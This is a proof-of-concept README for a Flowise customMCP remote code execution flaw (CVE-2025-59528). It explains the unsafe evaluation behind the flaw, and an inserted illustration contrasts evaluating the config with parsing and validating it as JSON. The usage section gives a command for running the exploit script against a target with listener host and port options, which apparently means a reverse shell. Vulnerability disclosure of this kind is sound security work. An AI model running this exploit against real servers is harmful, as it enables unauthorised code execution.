## https://sploitus.com/exploit?id=1D2ED15F-C3BE-5DEF-9DE7-CE96563EDE5C
# CVE-2025-59528 – Flowise CustomMCP Node RCE (PoC)


## Overview

This repo contains a proof of concept demonstrating **CVE-2025-59528** in Flowise v3.0.5.


The vulnerability exists in the `customMCP` node, where user-supplied `mcpServerConfig` input is processed in a way that leads to JavaScript code execution via unsafe evaluation using the `Function` constructor.
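
The difference between evaluating a config string as code and parsing it as data, shown as an added example that is not Flowise's code and not part of this repository. The function names, the allowed-key list and the sample inputs are assumptions constructed for illustration.

```javascript
// Added illustration; not Flowise source code. All names here are hypothetical.

// Vulnerable pattern: the config string is treated as JavaScript source.
// Any expression inside it runs with the privileges of the server process.
function parseConfigUnsafe(input) {
  return Function('return ' + input)();
}

// Hardened pattern: parse as data only, then validate against an allowlist.
const ALLOWED_KEYS = new Set(['command', 'args', 'env', 'url', 'headers']); // assumed schema

function parseConfigSafe(input) {
  let cfg;
  try {
    cfg = JSON.parse(input); // JSON has no expressions or calls, so nothing executes
  } catch (e) {
    throw new Error('mcpServerConfig must be valid JSON');
  }
  if (cfg === null || typeof cfg !== 'object' || Array.isArray(cfg)) {
    throw new Error('mcpServerConfig must be a JSON object');
  }
  for (const key of Object.keys(cfg)) {
    if (!ALLOWED_KEYS.has(key)) throw new Error('unexpected key: ' + key);
  }
  return cfg;
}

// Constructed inputs. The second one only flips a flag to prove evaluation happened.
const benign = '{"command": "npx", "args": ["-y", "some-mcp-server"]}';
const withExpression = '{"command": (globalThis.__evaluated = true, "npx")}';

function demo() {
  globalThis.__evaluated = false;
  parseConfigUnsafe(withExpression);
  const ranUnderUnsafe = globalThis.__evaluated; // expression was executed

  globalThis.__evaluated = false;
  let rejected = false;
  try { parseConfigSafe(withExpression); } catch (e) { rejected = true; }
  const ranUnderSafe = globalThis.__evaluated; // parser refused, nothing ran

  return { ranUnderUnsafe, ranUnderSafe, rejected, safeBenign: parseConfigSafe(benign) };
}

console.log(demo());
```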


## Affected Versions
| Affected | Fixed |
|----------|-------|
|   3.0.5  | 3.0.6 |


## Impact
An authenticated user may be able to execute arbitrary JavaScript on the server, potentially leading to remote code execution.

## Installation

### OSX/Linux
```bash
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
```

### Windows
```bash
git clone https://github.com/vanhari/CVE-2025-59528.git
cd CVE-2025-59528
```

## Usage
```bash
python3 CVE-2025-59528.py -t "" --api-key  --lhost  --lport 
```
![Usage](/assets/usage.png)

## Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by the tool.